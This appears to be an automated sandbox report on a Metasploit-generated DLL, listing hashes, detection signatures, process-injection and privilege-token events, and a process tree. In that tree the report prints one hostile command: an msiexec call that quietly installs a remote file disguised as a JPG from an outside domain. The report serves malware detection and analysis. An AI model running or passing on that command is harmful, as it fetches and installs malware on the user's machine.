metasploit | 57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a

General

Target

57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll
Size

5KB
MD5

f768a1ec913aea0915bcc20c17896be3
SHA1

a362956664379ff9860a3c56fb1daf6e000220c4
SHA256

57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a
SHA512

9fa8de6d9c4736dd0300e334137d3e60e42860f7b70dd452b35d515b3d7ebca0ef942d3bc65613d6be8e91a4f93c4c58b4e81d99649a9941cfafb46185f6dc9d

Score

10^/10

metasploit backdoor trojan

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Use of msiexec (install) with remote resource 1 IoCs

Processes:

msiexec.exe

pid process

1224 msiexec.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

rundll32.exe

description pid process target process

PID 1644 set thread context of 960 1644 rundll32.exe rundll32.exe

pid	process
1224	msiexec.exe

description	pid	process	target process
PID 1644 set thread context of 960	1644	rundll32.exe	rundll32.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	1224	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1224	msiexec.exe
Token: SeRestorePrivilege	1504	msiexec.exe
Token: SeTakeOwnershipPrivilege	1504	msiexec.exe
Token: SeSecurityPrivilege	1504	msiexec.exe
Token: SeCreateTokenPrivilege	1224	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1224	msiexec.exe
Token: SeLockMemoryPrivilege	1224	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1224	msiexec.exe
Token: SeMachineAccountPrivilege	1224	msiexec.exe
Token: SeTcbPrivilege	1224	msiexec.exe
Token: SeSecurityPrivilege	1224	msiexec.exe
Token: SeTakeOwnershipPrivilege	1224	msiexec.exe
Token: SeLoadDriverPrivilege	1224	msiexec.exe
Token: SeSystemProfilePrivilege	1224	msiexec.exe
Token: SeSystemtimePrivilege	1224	msiexec.exe
Token: SeProfSingleProcessPrivilege	1224	msiexec.exe
Token: SeIncBasePriorityPrivilege	1224	msiexec.exe
Token: SeCreatePagefilePrivilege	1224	msiexec.exe
Token: SeCreatePermanentPrivilege	1224	msiexec.exe
Token: SeBackupPrivilege	1224	msiexec.exe
Token: SeRestorePrivilege	1224	msiexec.exe
Token: SeShutdownPrivilege	1224	msiexec.exe
Token: SeDebugPrivilege	1224	msiexec.exe
Token: SeAuditPrivilege	1224	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1224	msiexec.exe
Token: SeChangeNotifyPrivilege	1224	msiexec.exe
Token: SeRemoteShutdownPrivilege	1224	msiexec.exe
Token: SeUndockPrivilege	1224	msiexec.exe
Token: SeSyncAgentPrivilege	1224	msiexec.exe
Token: SeEnableDelegationPrivilege	1224	msiexec.exe
Token: SeManageVolumePrivilege	1224	msiexec.exe
Token: SeImpersonatePrivilege	1224	msiexec.exe
Token: SeCreateGlobalPrivilege	1224	msiexec.exe

Suspicious use of WriteProcessMemory 22 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1564 wrote to memory of 1644	1564	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 1644 wrote to memory of 960	1644	rundll32.exe	rundll32.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe
PID 960 wrote to memory of 1224	960	rundll32.exe	msiexec.exe

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\57ebc1be9d52a18a03f1341fe998afa8c54facc3d96c0bf80a201a80741d948a.dll,#1
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1644

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\SysWOW64\msiexec.exe
msiexec /i https://dl.eqwauemt.com/Downupdatesoftmakerup.jpg /q
4⤵
- Use of msiexec (install) with remote resource
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1504

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/960-56-0x000000000062178C-mapping.dmp

Download
memory/1224-58-0x0000000000000000-mapping.dmp

Download
memory/1504-60-0x000007FEFC211000-0x000007FEFC213000-memory.dmp

Filesize
8KB

Download
memory/1644-54-0x0000000000000000-mapping.dmp

Download
memory/1644-55-0x00000000763E1000-0x00000000763E3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing